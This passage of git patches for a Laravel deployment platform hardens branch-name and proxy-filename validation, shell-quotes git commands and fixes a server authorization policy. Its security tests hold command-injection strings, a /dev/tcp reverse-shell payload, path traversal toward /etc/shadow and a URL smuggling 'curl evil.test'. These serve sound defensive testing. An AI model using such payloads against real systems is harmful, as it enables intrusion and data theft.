         'ports_mappings' => 'string|regex:/^(\d+:\d+)(,\d+:\d+)*$/|nullable',
         'custom_network_aliases' => 'string|nullable',
-        'base_directory' => \App\Support\ValidationPatterns::directoryPathRules(),
-        'publish_directory' => \App\Support\ValidationPatterns::directoryPathRules(),
+        'base_directory' => ValidationPatterns::directoryPathRules(),
+        'publish_directory' => ValidationPatterns::directoryPathRules(),
         'health_check_enabled' => 'boolean',
         'health_check_type' => 'string|in:http,cmd',
         'health_check_command' => ['nullable', 'string', 'max:1000', 'regex:/^[a-zA-Z0-9 \-_.\/:=@,+]+$/'],
@@ -125,24 +127,24 @@ function sharedDataApplications()
         'limits_cpuset' => 'string|nullable',
         'limits_cpu_shares' => 'numeric',
         'custom_labels' => 'string|nullable',
-        'custom_docker_run_options' => \App\Support\ValidationPatterns::shellSafeCommandRules(2000),
+        'custom_docker_run_options' => ValidationPatterns::shellSafeCommandRules(2000),
         // Security: deployment commands are intentionally arbitrary shell (e.g. "php artisan migrate").
         // Access is gated by API token authentication. Commands run inside the app container, not the host.
         'post_deployment_command' => 'string|nullable',
-        'post_deployment_command_container' => \App\Support\ValidationPatterns::containerNameRules(),
+        'post_deployment_command_container' => ValidationPatterns::containerNameRules(),
         'pre_deployment_command' => 'string|nullable',
-        'pre_deployment_command_container' => \App\Support\ValidationPatterns::containerNameRules(),
+        'pre_deployment_command_container' => ValidationPatterns::containerNameRules(),
         'manual_webhook_secret_github' => 'string|nullable',
         'manual_webhook_secret_gitlab' => 'string|nullable',
         'manual_webhook_secret_bitbucket' => 'string|nullable',
         'manual_webhook_secret_gitea' => 'string|nullable',
-        'dockerfile_location' => \App\Support\ValidationPatterns::filePathRules(),
-        'dockerfile_target_build' => \App\Support\ValidationPatterns::dockerTargetRules(),
-        'docker_compose_location' => \App\Support\ValidationPatterns::filePathRules(),
+        'dockerfile_location' => ValidationPatterns::filePathRules(),
+        'dockerfile_target_build' => ValidationPatterns::dockerTargetRules(),
+        'docker_compose_location' => ValidationPatterns::filePathRules(),
         'docker_compose' => 'string|nullable',
         'docker_compose_domains' => 'array|nullable',
-        'docker_compose_custom_start_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
-        'docker_compose_custom_build_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
+        'docker_compose_custom_start_command' => ValidationPatterns::shellSafeCommandRules(),
+        'docker_compose_custom_build_command' => ValidationPatterns::shellSafeCommandRules(),
         'is_container_label_escape_enabled' => 'boolean',
         'is_preserve_repository_enabled' => 'boolean',
     ];
diff --git a/tests/Feature/CommandInjectionSecurityTest.php b/tests/Feature/CommandInjectionSecurityTest.php
index d42a8490a..558a8bd4f 100644
--- a/tests/Feature/CommandInjectionSecurityTest.php
+++ b/tests/Feature/CommandInjectionSecurityTest.php
@@ -1,6 +1,7 @@
 <?php
 
 use App\Jobs\ApplicationDeploymentJob;
+use App\Rules\ValidGitBranch;
 use App\Support\ValidationPatterns;
 
 describe('deployment job path field validation', function () {
@@ -978,3 +979,46 @@
         expect($merged['start_command'])->toContain('regex:'.ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN);
     });
 });
+
+describe('git_branch validation rules survive array_merge in controller', function () {
+    test('git_branch uses ValidGitBranch in shared application rules', function () {
+        $rules = sharedDataApplications();
+
+        expect($rules['git_branch'])->toBeArray();
+        expect(collect($rules['git_branch'])->contains(fn ($rule) => $rule instanceof ValidGitBranch))->toBeTrue();
+    });
+
+    test('git_branch rejects shell metacharacter payloads', function (string $payload) {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['git_branch' => $payload],
+            ['git_branch' => $rules['git_branch']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    })->with([
+        'semicolon command separator' => 'main;touch /tmp/pwned;#',
+        'command substitution' => 'main$(touch /tmp/pwned)',
+        'backtick substitution' => 'main`touch /tmp/pwned`',
+        'pipe operator' => 'main|id',
+        'newline injection' => "main\ntouch /tmp/pwned",
+        'redirect operator' => 'main>/tmp/pwned',
+        'single quote breakout' => "main';id;#",
+    ]);
+
+    test('git_branch accepts safe branch names', function (string $branch) {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['git_branch' => $branch],
+            ['git_branch' => $rules['git_branch']]
+        );
+
+        expect($validator->fails())->toBeFalse();
+    })->with([
+        'main',
+        'feature/my-branch',
+        'release_1.2.3',
+    ]);
+});

From 419593e7d485c1222d0b75b74d7de5b708901aae Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 1 Jun 2026 15:14:28 +0200
Subject: [PATCH 66/90] fix(proxy): tighten config validation

---
 .../Proxy/DynamicConfigurationNavbar.php      |  7 +-
 .../Server/Proxy/NewDynamicConfiguration.php  |  3 +-
 app/Policies/ServerPolicy.php                 | 26 ++++----
 tests/Unit/ProxyConfigurationSecurityTest.php | 52 +++++++++++----
 tests/Unit/ServerPolicyAuthorizationTest.php  | 66 +++++++++++++++++++
 5 files changed, 121 insertions(+), 33 deletions(-)
 create mode 100644 tests/Unit/ServerPolicyAuthorizationTest.php

diff --git a/app/Livewire/Server/Proxy/DynamicConfigurationNavbar.php b/app/Livewire/Server/Proxy/DynamicConfigurationNavbar.php
index c67591cf5..20d14ddc7 100644
--- a/app/Livewire/Server/Proxy/DynamicConfigurationNavbar.php
+++ b/app/Livewire/Server/Proxy/DynamicConfigurationNavbar.php
@@ -28,12 +28,11 @@ public function delete(string $fileName)
 
         // Decode filename: pipes are used to encode dots for Livewire property binding
         // (e.g., 'my|service.yaml' -> 'my.service.yaml')
-        // This must happen BEFORE validation because validateShellSafePath() correctly
-        // rejects pipe characters as dangerous shell metacharacters
+        // This must happen BEFORE validation because validateFilenameSafe()
+        // rejects pipe characters through validateShellSafePath().
         $file = str_replace('|', '.', $fileName);
 
-        // Validate filename to prevent command injection
-        validateShellSafePath($file, 'proxy configuration filename');
+        validateFilenameSafe($file, 'proxy configuration filename');
 
         if ($proxy_type === 'CADDY' && $file === 'Caddyfile') {
             $this->dispatch('error', 'Cannot delete Caddyfile.');
diff --git a/app/Livewire/Server/Proxy/NewDynamicConfiguration.php b/app/Livewire/Server/Proxy/NewDynamicConfiguration.php
index 31a1dfc7e..481d89c78 100644
--- a/app/Livewire/Server/Proxy/NewDynamicConfiguration.php
+++ b/app/Livewire/Server/Proxy/NewDynamicConfiguration.php
@@ -43,8 +43,7 @@ public function addDynamicConfiguration()
                 'value' => 'required',
             ]);
 
-            // Additional security validation to prevent command injection
-            validateShellSafePath($this->fileName, 'proxy configuration filename');
+            validateFilenameSafe($this->fileName, 'proxy configuration filename');
 
             if (data_get($this->parameters, 'server_uuid')) {
                 $this->server = Server::ownedByCurrentTeam()->whereUuid(data_get($this->parameters, 'server_uuid'))->first();
diff --git a/app/Policies/ServerPolicy.php b/app/Policies/ServerPolicy.php
index 6d2396a7d..659598139 100644
--- a/app/Policies/ServerPolicy.php
+++ b/app/Policies/ServerPolicy.php
@@ -28,8 +28,7 @@ public function view(User $user, Server $server): bool
      */
     public function create(User $user): bool
     {
-        // return $user->isAdmin();
-        return true;
+        return $user->isAdmin();
     }
 
     /**
@@ -37,8 +36,7 @@ public function create(User $user): bool
      */
     public function update(User $user, Server $server): bool
     {
-        // return $user->isAdmin() && $user->teams->contains('id', $server->team_id);
-        return true;
+        return $this->canManageServer($user, $server);
     }
 
     /**
@@ -46,8 +44,7 @@ public function update(User $user, Server $server): bool
      */
     public function delete(User $user, Server $server): bool
     {
-        // return $user->isAdmin() && $user->teams->contains('id', $server->team_id);
-        return true;
+        return $this->canManageServer($user, $server);
     }
 
     /**
@@ -71,8 +68,7 @@ public function forceDelete(User $user, Server $server): bool
      */
     public function manageProxy(User $user, Server $server): bool
     {
-        // return $user->isAdmin() && $user->teams->contains('id', $server->team_id);
-        return true;
+        return $this->canManageServer($user, $server);
     }
 
     /**
@@ -80,8 +76,7 @@ public function manageProxy(User $user, Server $server): bool
      */
     public function manageSentinel(User $user, Server $server): bool
     {
-        // return $user->isAdmin() && $user->teams->contains('id', $server->team_id);
-        return true;
+        return $this->canManageServer($user, $server);
     }
 
     /**
@@ -89,8 +84,7 @@ public function manageSentinel(User $user, Server $server): bool
      */
     public function manageCaCertificate(User $user, Server $server): bool
     {
-        // return $user->isAdmin() && $user->teams->contains('id', $server->team_id);
-        return true;
+        return $this->canManageServer($user, $server);
     }
 
     /**
@@ -98,7 +92,11 @@ public function manageCaCertificate(User $user, Server $server): bool
      */
     public function viewSecurity(User $user, Server $server): bool
     {
-        // return $user->isAdmin() && $user->teams->contains('id', $server->team_id);
-        return true;
+        return $this->canManageServer($user, $server);
+    }
+
+    private function canManageServer(User $user, Server $server): bool
+    {
+        return $user->isAdmin() && $user->teams->contains('id', $server->team_id);
     }
 }
diff --git a/tests/Unit/ProxyConfigurationSecurityTest.php b/tests/Unit/ProxyConfigurationSecurityTest.php
index 72c5e4c3a..4bcb70361 100644
--- a/tests/Unit/ProxyConfigurationSecurityTest.php
+++ b/tests/Unit/ProxyConfigurationSecurityTest.php
@@ -12,43 +12,69 @@
  *  - app/Livewire/Server/Proxy/DynamicConfigurationNavbar.php
  */
 test('proxy configuration rejects command injection in filename with command substitution', function () {
-    expect(fn () => validateShellSafePath('test$(whoami)', 'proxy configuration filename'))
+    expect(fn () => validateFilenameSafe('test$(whoami)', 'proxy configuration filename'))
         ->toThrow(Exception::class);
 });
 
 test('proxy configuration rejects command injection with semicolon', function () {
-    expect(fn () => validateShellSafePath('config; id > /tmp/pwned', 'proxy configuration filename'))
+    expect(fn () => validateFilenameSafe('config; id > /tmp/pwned', 'proxy configuration filename'))
         ->toThrow(Exception::class);
 });
 
 test('proxy configuration rejects command injection with pipe', function () {
-    expect(fn () => validateShellSafePath('config | cat /etc/passwd', 'proxy configuration filename'))
+    expect(fn () => validateFilenameSafe('config | cat /etc/passwd', 'proxy configuration filename'))
         ->toThrow(Exception::class);
 });
 
 test('proxy configuration rejects command injection with backticks', function () {
-    expect(fn () => validateShellSafePath('config`whoami`.yaml', 'proxy configuration filename'))
+    expect(fn () => validateFilenameSafe('config`whoami`.yaml', 'proxy configuration filename'))
         ->toThrow(Exception::class);
 });
 
 test('proxy configuration rejects command injection with ampersand', function () {
-    expect(fn () => validateShellSafePath('config && rm -rf /', 'proxy configuration filename'))
+    expect(fn () => validateFilenameSafe('config && rm -rf /', 'proxy configuration filename'))
         ->toThrow(Exception::class);
 });
 
 test('proxy configuration rejects command injection with redirect operators', function () {
-    expect(fn () => validateShellSafePath('test > /tmp/evil', 'proxy configuration filename'))
+    expect(fn () => validateFilenameSafe('test > /tmp/evil', 'proxy configuration filename'))
         ->toThrow(Exception::class);
 
-    expect(fn () => validateShellSafePath('test < /etc/shadow', 'proxy configuration filename'))
+    expect(fn () => validateFilenameSafe('test < /etc/shadow', 'proxy configuration filename'))
         ->toThrow(Exception::class);
 });
 
 test('proxy configuration rejects reverse shell payload', function () {
-    expect(fn () => validateShellSafePath('test$(bash -i >& /dev/tcp/10.0.0.1/9999 0>&1)', 'proxy configuration filename'))
+    expect(fn () => validateFilenameSafe('test$(bash -i >& /dev/tcp/10.0.0.1/9999 0>&1)', 'proxy configuration filename'))
         ->toThrow(Exception::class);
 });
 
+test('proxy configuration rejects path traversal filenames', function (string $filename) {
+    expect(fn () => validateFilenameSafe($filename, 'proxy configuration filename'))
+        ->toThrow(Exception::class);
+})->with([
+    '../VICTIM_FILE',
+    '../../etc/shadow',
+    '/etc/passwd',
+    'subdir/config.yaml',
+    'subdir\\config.yaml',
+    'config..yaml',
+    "config.yaml\0../../etc/passwd",
+]);
+
+test('dynamic proxy components use filename-safe validation', function () {
+    $deleteComponent = file_get_contents(getcwd().'/app/Livewire/Server/Proxy/DynamicConfigurationNavbar.php');
+    $createComponent = file_get_contents(getcwd().'/app/Livewire/Server/Proxy/NewDynamicConfiguration.php');
+
+    expect($deleteComponent)
+        ->toContain("validateFilenameSafe(\$file, 'proxy configuration filename')")
+        ->not->toContain("validateShellSafePath(\$file, 'proxy configuration filename')");
+
+    expect($createComponent)
+        ->toContain("validateFilenameSafe(\$this->fileName, 'proxy configuration filename')")
+        ->not->toContain("validateShellSafePath(\$this->fileName, 'proxy configuration filename')");
+});
+
 test('proxy configuration escapes filenames properly', function () {
     $filename = "config'test.yaml";
     $escaped = escapeshellarg($filename);
@@ -64,20 +90,20 @@
 });
 
 test('proxy configuration accepts legitimate Traefik filenames', function () {
-    expect(fn () => validateShellSafePath('my-service.yaml', 'proxy configuration filename'))
+    expect(fn () => validateFilenameSafe('my-service.yaml', 'proxy configuration filename'))
         ->not->toThrow(Exception::class);
 
-    expect(fn () => validateShellSafePath('app.yml', 'proxy configuration filename'))
+    expect(fn () => validateFilenameSafe('app.yml', 'proxy configuration filename'))
         ->not->toThrow(Exception::class);
 
-    expect(fn () => validateShellSafePath('router_config.yaml', 'proxy configuration filename'))
+    expect(fn () => validateFilenameSafe('router_config.yaml', 'proxy configuration filename'))
         ->not->toThrow(Exception::class);
 });
 
 test('proxy configuration accepts legitimate Caddy filenames', function () {
-    expect(fn () => validateShellSafePath('my-service.caddy', 'proxy configuration filename'))
+    expect(fn () => validateFilenameSafe('my-service.caddy', 'proxy configuration filename'))
         ->not->toThrow(Exception::class);
 
-    expect(fn () => validateShellSafePath('app_config.caddy', 'proxy configuration filename'))
+    expect(fn () => validateFilenameSafe('app_config.caddy', 'proxy configuration filename'))
         ->not->toThrow(Exception::class);
 });
diff --git a/tests/Unit/ServerPolicyAuthorizationTest.php b/tests/Unit/ServerPolicyAuthorizationTest.php
new file mode 100644
index 000000000..97b8adbc6
--- /dev/null
+++ b/tests/Unit/ServerPolicyAuthorizationTest.php
@@ -0,0 +1,66 @@
+<?php
+
+use App\Models\Server;
+use App\Models\Team;
+use App\Models\User;
+use App\Policies\ServerPolicy;
+use Illuminate\Database\Eloquent\Relations\Pivot;
+
+function userWithServerRole(int $teamId, string $role): User
+{
+    $team = new Team;
+    $team->setRawAttributes(['id' => $teamId], true);
+    $team->setRelation('pivot', new Pivot(['role' => $role]));
+
+    $user = new User;
+    $user->setRelation('teams', collect([$team]));
+    $user->setRelation('pivot', new Pivot(['role' => $role]));
+
+    return $user;
+}
+
+function serverPolicyServer(int $teamId): Server
+{
+    $server = new Server;
+    $server->setRawAttributes(['team_id' => $teamId], true);
+
+    return $server;
+}
+
+test('server members cannot update or manage servers', function () {
+    $policy = new ServerPolicy;
+    $member = userWithServerRole(1, 'member');
+    $server = serverPolicyServer(1);
+
+    expect($policy->update($member, $server))->toBeFalse()
+        ->and($policy->create($member))->toBeFalse()
+        ->and($policy->delete($member, $server))->toBeFalse()
+        ->and($policy->manageProxy($member, $server))->toBeFalse()
+        ->and($policy->manageSentinel($member, $server))->toBeFalse()
+        ->and($policy->manageCaCertificate($member, $server))->toBeFalse()
+        ->and($policy->viewSecurity($member, $server))->toBeFalse();
+});
+
+test('server admins can update and manage servers in their team', function (string $role) {
+    $policy = new ServerPolicy;
+    $admin = userWithServerRole(1, $role);
+    $server = serverPolicyServer(1);
+
+    expect($policy->update($admin, $server))->toBeTrue()
+        ->and($policy->create($admin))->toBeTrue()
+        ->and($policy->delete($admin, $server))->toBeTrue()
+        ->and($policy->manageProxy($admin, $server))->toBeTrue()
+        ->and($policy->manageSentinel($admin, $server))->toBeTrue()
+        ->and($policy->manageCaCertificate($admin, $server))->toBeTrue()
+        ->and($policy->viewSecurity($admin, $server))->toBeTrue();
+})->with(['admin', 'owner']);
+
+test('server admins cannot update servers outside their team', function () {
+    $policy = new ServerPolicy;
+    $admin = userWithServerRole(2, 'admin');
+    $server = serverPolicyServer(1);
+
+    expect($policy->update($admin, $server))->toBeFalse()
+        ->and($policy->delete($admin, $server))->toBeFalse()
+        ->and($policy->manageProxy($admin, $server))->toBeFalse();
+});

From 5e4873322e2c7358d249888fe6b55bb0ba76d324 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 1 Jun 2026 15:15:38 +0200
Subject: [PATCH 67/90] chore: improve deployment input handling

---
 app/Jobs/ApplicationDeploymentJob.php         | 17 +++-
 bootstrap/helpers/api.php                     | 30 +++---
 .../Feature/CommandInjectionSecurityTest.php  | 96 +++++++++++++++++++
 3 files changed, 126 insertions(+), 17 deletions(-)

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index 2edc08235..094eeb249 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -2232,11 +2232,22 @@ private function set_coolify_variables()
             }
         }
         if (isset($this->application->git_branch)) {
-            $this->coolify_variables .= "COOLIFY_BRANCH={$this->application->git_branch} ";
+            $this->coolify_variables .= 'COOLIFY_BRANCH='.escapeShellValue($this->application->git_branch).' ';
         }
         $this->coolify_variables .= "COOLIFY_RESOURCE_UUID={$this->application->uuid} ";
     }
 
+    private function gitLsRemoteCommand(string $lsRemoteRef, ?string $identityFile = null): string
+    {
+        $sshCommand = "ssh -o ConnectTimeout=30 -p {$this->customPort} -o Port={$this->customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null";
+
+        if ($identityFile !== null) {
+            $sshCommand .= " -i {$identityFile}";
+        }
+
+        return 'GIT_SSH_COMMAND="'.$sshCommand.'" git ls-remote '.escapeshellarg($this->fullRepoUrl).' '.escapeshellarg($lsRemoteRef);
+    }
+
     private function check_git_if_build_needed()
     {
         if (is_object($this->source) && $this->source->getMorphClass() === GithubApp::class && $this->source->is_public === false) {
@@ -2282,7 +2293,7 @@ private function check_git_if_build_needed()
                     executeInDocker($this->deployment_uuid, 'chmod 600 /root/.ssh/id_rsa'),
                 ],
                 [
-                    executeInDocker($this->deployment_uuid, "GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$this->customPort} -o Port={$this->customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /root/.ssh/id_rsa\" git ls-remote {$this->fullRepoUrl} {$lsRemoteRef}"),
+                    executeInDocker($this->deployment_uuid, $this->gitLsRemoteCommand($lsRemoteRef, '/root/.ssh/id_rsa')),
                     'hidden' => true,
                     'save' => 'git_commit_sha',
                 ]
@@ -2290,7 +2301,7 @@ private function check_git_if_build_needed()
         } else {
             $this->execute_remote_command(
                 [
-                    executeInDocker($this->deployment_uuid, "GIT_SSH_COMMAND=\"ssh -o ConnectTimeout=30 -p {$this->customPort} -o Port={$this->customPort} -o LogLevel=ERROR -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" git ls-remote {$this->fullRepoUrl} {$lsRemoteRef}"),
+                    executeInDocker($this->deployment_uuid, $this->gitLsRemoteCommand($lsRemoteRef)),
                     'hidden' => true,
                     'save' => 'git_commit_sha',
                 ],
diff --git a/bootstrap/helpers/api.php b/bootstrap/helpers/api.php
index 4b76200d2..47cca8519 100644
--- a/bootstrap/helpers/api.php
+++ b/bootstrap/helpers/api.php
@@ -3,6 +3,8 @@
 use App\Enums\BuildPackTypes;
 use App\Enums\RedirectTypes;
 use App\Enums\StaticImageTypes;
+use App\Rules\ValidGitBranch;
+use App\Support\ValidationPatterns;
 use Illuminate\Database\Eloquent\Collection;
 use Illuminate\Http\Request;
 use Illuminate\Validation\Rule;
@@ -83,7 +85,7 @@ function sharedDataApplications()
 {
     return [
         'git_repository' => 'string',
-        'git_branch' => 'string',
+        'git_branch' => ['string', new ValidGitBranch],
         'build_pack' => Rule::enum(BuildPackTypes::class),
         'is_static' => 'boolean',
         'is_spa' => 'boolean',
@@ -95,14 +97,14 @@ function sharedDataApplications()
         'git_commit_sha' => ['string', 'regex:/^[a-zA-Z0-9][a-zA-Z0-9._\-\/]*$/'],
         'docker_registry_image_name' => 'string|nullable',
         'docker_registry_image_tag' => 'string|nullable',
-        'install_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
-        'build_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
-        'start_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
+        'install_command' => ValidationPatterns::shellSafeCommandRules(),
+        'build_command' => ValidationPatterns::shellSafeCommandRules(),
+        'start_command' => ValidationPatterns::shellSafeCommandRules(),
         'ports_exposes' => 'string|regex:/^(\d+)(,\d+)*$/',
         'ports_mappings' => 'string|regex:/^(\d+:\d+)(,\d+:\d+)*$/|nullable',
         'custom_network_aliases' => 'string|nullable',
-        'base_directory' => \App\Support\ValidationPatterns::directoryPathRules(),
-        'publish_directory' => \App\Support\ValidationPatterns::directoryPathRules(),
+        'base_directory' => ValidationPatterns::directoryPathRules(),
+        'publish_directory' => ValidationPatterns::directoryPathRules(),
         'health_check_enabled' => 'boolean',
         'health_check_type' => 'string|in:http,cmd',
         'health_check_command' => ['nullable', 'string', 'max:1000', 'regex:/^[a-zA-Z0-9 \-_.\/:=@,+]+$/'],
@@ -125,24 +127,24 @@ function sharedDataApplications()
         'limits_cpuset' => 'string|nullable',
         'limits_cpu_shares' => 'numeric',
         'custom_labels' => 'string|nullable',
-        'custom_docker_run_options' => \App\Support\ValidationPatterns::shellSafeCommandRules(2000),
+        'custom_docker_run_options' => ValidationPatterns::shellSafeCommandRules(2000),
         // Security: deployment commands are intentionally arbitrary shell (e.g. "php artisan migrate").
         // Access is gated by API token authentication. Commands run inside the app container, not the host.
         'post_deployment_command' => 'string|nullable',
-        'post_deployment_command_container' => \App\Support\ValidationPatterns::containerNameRules(),
+        'post_deployment_command_container' => ValidationPatterns::containerNameRules(),
         'pre_deployment_command' => 'string|nullable',
-        'pre_deployment_command_container' => \App\Support\ValidationPatterns::containerNameRules(),
+        'pre_deployment_command_container' => ValidationPatterns::containerNameRules(),
         'manual_webhook_secret_github' => 'string|nullable',
         'manual_webhook_secret_gitlab' => 'string|nullable',
         'manual_webhook_secret_bitbucket' => 'string|nullable',
         'manual_webhook_secret_gitea' => 'string|nullable',
-        'dockerfile_location' => \App\Support\ValidationPatterns::filePathRules(),
-        'dockerfile_target_build' => \App\Support\ValidationPatterns::dockerTargetRules(),
-        'docker_compose_location' => \App\Support\ValidationPatterns::filePathRules(),
+        'dockerfile_location' => ValidationPatterns::filePathRules(),
+        'dockerfile_target_build' => ValidationPatterns::dockerTargetRules(),
+        'docker_compose_location' => ValidationPatterns::filePathRules(),
         'docker_compose' => 'string|nullable',
         'docker_compose_domains' => 'array|nullable',
-        'docker_compose_custom_start_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
-        'docker_compose_custom_build_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
+        'docker_compose_custom_start_command' => ValidationPatterns::shellSafeCommandRules(),
+        'docker_compose_custom_build_command' => ValidationPatterns::shellSafeCommandRules(),
         'is_container_label_escape_enabled' => 'boolean',
         'is_preserve_repository_enabled' => 'boolean',
     ];
diff --git a/tests/Feature/CommandInjectionSecurityTest.php b/tests/Feature/CommandInjectionSecurityTest.php
index d42a8490a..a450aa919 100644
--- a/tests/Feature/CommandInjectionSecurityTest.php
+++ b/tests/Feature/CommandInjectionSecurityTest.php
@@ -1,6 +1,8 @@
 <?php
 
 use App\Jobs\ApplicationDeploymentJob;
+use App\Models\Application;
+use App\Models\ApplicationSetting;
 use App\Support\ValidationPatterns;
 
 describe('deployment job path field validation', function () {
@@ -127,6 +129,38 @@
 });
 
 describe('API validation rules for path fields', function () {
+    test('git_branch validation rejects shell metacharacters', function (string $branch) {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['git_branch' => $branch],
+            ['git_branch' => $rules['git_branch']]
+        );
+
+        expect($validator->fails())->toBeTrue();
+    })->with([
+        'backtick command substitution' => 'main`id`',
+        'dollar command substitution' => 'main$(id)',
+        'semicolon command separator' => 'main;id',
+        'ifs shell expansion' => 'main${IFS}id',
+        'space separator' => 'main branch',
+    ]);
+
+    test('git_branch validation allows safe branch names', function (string $branch) {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['git_branch' => $branch],
+            ['git_branch' => $rules['git_branch']]
+        );
+
+        expect($validator->fails())->toBeFalse();
+    })->with([
+        'main',
+        'feature/safe-branch',
+        'release_2026.06',
+    ]);
+
     test('dockerfile_location validation rejects shell metacharacters', function () {
         $rules = sharedDataApplications();
 
@@ -183,6 +217,68 @@
     });
 });
 
+describe('deployment git command escaping', function () {
+    test('ls-remote command shell-quotes repository and ref arguments', function () {
+        $job = new ReflectionClass(ApplicationDeploymentJob::class);
+        $instance = $job->newInstanceWithoutConstructor();
+
+        foreach ([
+            'customPort' => 22,
+            'fullRepoUrl' => "git@example.com:org/repo.git'; curl evil.test; #",
+        ] as $property => $value) {
+            $reflectionProperty = $job->getProperty($property);
+            $reflectionProperty->setAccessible(true);
+            $reflectionProperty->setValue($instance, $value);
+        }
+
+        $method = $job->getMethod('gitLsRemoteCommand');
+        $method->setAccessible(true);
+
+        $command = $method->invoke($instance, 'refs/heads/main`id`', '/root/.ssh/id_rsa');
+
+        expect($command)
+            ->toContain("git ls-remote 'git@example.com:org/repo.git'\\''; curl evil.test; #' 'refs/heads/main`id`'")
+            ->toContain('-i /root/.ssh/id_rsa')
+            ->not->toContain('repo.git; curl');
+    });
+
+    test('coolify branch shell assignment is quoted', function () {
+        $job = new ReflectionClass(ApplicationDeploymentJob::class);
+        $instance = $job->newInstanceWithoutConstructor();
+
+        $application = new Application;
+        $application->uuid = 'app-uuid';
+        $application->git_branch = 'main`id`';
+        $application->fqdn = null;
+        $application->compose_parsing_version = '3';
+
+        $settings = new ApplicationSetting;
+        $settings->include_source_commit_in_build = false;
+        $application->setRelation('settings', $settings);
+
+        foreach ([
+            'application' => $application,
+            'commit' => 'HEAD',
+            'pull_request_id' => 0,
+        ] as $property => $value) {
+            $reflectionProperty = $job->getProperty($property);
+            $reflectionProperty->setAccessible(true);
+            $reflectionProperty->setValue($instance, $value);
+        }
+
+        $method = $job->getMethod('set_coolify_variables');
+        $method->setAccessible(true);
+        $method->invoke($instance);
+
+        $coolifyVariables = $job->getProperty('coolify_variables');
+        $coolifyVariables->setAccessible(true);
+
+        expect($coolifyVariables->getValue($instance))
+            ->toContain("COOLIFY_BRANCH='main`id`' ")
+            ->toContain('COOLIFY_RESOURCE_UUID=app-uuid ');
+    });
+});
+
 describe('sharedDataApplications rules survive array_merge in controller', function () {
     test('docker_compose_location safe regex is not overridden by local rules', function () {
         $sharedRules = sharedDataApplications();

From a511bd9b67868848c8d70bed9b8f9ff5c8a18bbc Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 1 Jun 2026 15:17:55 +0200
Subject: [PATCH 68/90] fix(api): validate token team context

---
 app/Actions/User/DeleteUserTeams.php          |   3 +
 app/Actions/User/RevokeUserTeamTokens.php     |  43 ++++++
 app/Http/Kernel.php                           |   2 +
 .../EnsureTokenBelongsToCurrentTeamMember.php |  37 +++++
 app/Livewire/Team/Member.php                  |  14 +-
 app/Mcp/Concerns/ResolvesTeam.php             |  10 +-
 app/Models/Team.php                           |   3 +
 app/Models/User.php                           |   4 +
 app/Traits/DeletesUserSessions.php            |   2 +
 bootstrap/helpers/api.php                     |  37 +++--
 routes/ai.php                                 |   2 +-
 routes/api.php                                |   4 +-
 .../ApiTokenTeamLifecycleSecurityTest.php     | 128 ++++++++++++++++++
 tests/Feature/Mcp/McpEndpointTest.php         |  11 ++
 14 files changed, 277 insertions(+), 23 deletions(-)
 create mode 100644 app/Actions/User/RevokeUserTeamTokens.php
 create mode 100644 app/Http/Middleware/EnsureTokenBelongsToCurrentTeamMember.php
 create mode 100644 tests/Feature/ApiTokenTeamLifecycleSecurityTest.php

diff --git a/app/Actions/User/DeleteUserTeams.php b/app/Actions/User/DeleteUserTeams.php
index d572db9e7..b2b06e7ba 100644
--- a/app/Actions/User/DeleteUserTeams.php
+++ b/app/Actions/User/DeleteUserTeams.php
@@ -137,9 +137,11 @@ public function execute(): array
 
                 // Update the new owner's role to owner
                 $team->members()->updateExistingPivot($newOwner->id, ['role' => 'owner']);
+                RevokeUserTeamTokens::forUserTeam($newOwner, $team->id);
 
                 // Remove the current user from the team
                 $team->members()->detach($this->user->id);
+                RevokeUserTeamTokens::forUserTeam($this->user, $team->id);
 
                 $counts['transferred']++;
             } catch (\Exception $e) {
@@ -152,6 +154,7 @@ public function execute(): array
         foreach ($preview['to_leave'] as $team) {
             try {
                 $team->members()->detach($this->user->id);
+                RevokeUserTeamTokens::forUserTeam($this->user, $team->id);
                 $counts['left']++;
             } catch (\Exception $e) {
                 \Log::error("Failed to remove user from team {$team->id}: ".$e->getMessage());
diff --git a/app/Actions/User/RevokeUserTeamTokens.php b/app/Actions/User/RevokeUserTeamTokens.php
new file mode 100644
index 000000000..9aadf1eeb
--- /dev/null
+++ b/app/Actions/User/RevokeUserTeamTokens.php
@@ -0,0 +1,43 @@
+<?php
+
+namespace App\Actions\User;
+
+use App\Models\PersonalAccessToken;
+use App\Models\User;
+use Illuminate\Database\Eloquent\Builder;
+
+class RevokeUserTeamTokens
+{
+    public static function forUserTeam(User|int $user, int|string $teamId): int
+    {
+        return self::baseQuery()
+            ->where('tokenable_id', self::userId($user))
+            ->where('team_id', $teamId)
+            ->delete();
+    }
+
+    public static function forUser(User|int $user): int
+    {
+        return self::baseQuery()
+            ->where('tokenable_id', self::userId($user))
+            ->delete();
+    }
+
+    public static function forTeam(int|string $teamId): int
+    {
+        return self::baseQuery()
+            ->where('team_id', $teamId)
+            ->delete();
+    }
+
+    private static function baseQuery(): Builder
+    {
+        return PersonalAccessToken::query()
+            ->where('tokenable_type', User::class);
+    }
+
+    private static function userId(User|int $user): int
+    {
